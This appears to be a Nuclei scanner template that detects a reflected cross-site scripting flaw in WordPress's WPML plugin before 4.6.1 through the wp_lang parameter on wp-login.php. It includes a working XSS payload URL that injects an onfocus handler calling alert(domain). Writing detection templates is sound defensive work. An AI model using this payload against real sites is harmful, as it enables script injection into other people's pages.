nuclei-templates/http/vulnerabilities/wordpress/wpml-xss.yaml

43 lines
1.2 KiB
YAML

id: wpml-xss
info:
name: WordPress Plugin WPML Version < 4.6.1 Cross-Site Scripting
author: bugvsme
severity: medium
description: |
WordPress Plugin WPML Version < 4.6.1 is vulnerable to RXSS via wp_lang parameter.
remediation: |
Update the WPML plugin to 4.6.1 version.
reference:
- https://wpml.org/fr/changelog/2023/03/wpml-4-6-1-important-security-update/
- https://twitter.com/bug_vs_me/status/1652789903766200320
metadata:
verified: true
max-request: 1
tags: xss,wp,wordpress,wpml,wp-plugin
http:
- method: GET
path:
- '{{BaseURL}}/wp-login.php?wp_lang=en_US%27'
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- '#039;"='
- 'wpml_lang'
condition: and
extractors:
- type: dsl
dsl:
- 'host + "/wp-login.php?wp_lang=%20=id=x+type=image%20id=xss%20onfoc%3C!%3Eusin+alert(domain)%0c"'
# digest: 490a0046304402204eedbf4fc648279f1cda703c597974e6e810d7c372103ac46e82c81f39c5189a0220191a25798673fe2f349854b3b61c04b67569864f95dcb6f905b322d13839bd2e:922c64590222798bb761d5b6d8e72950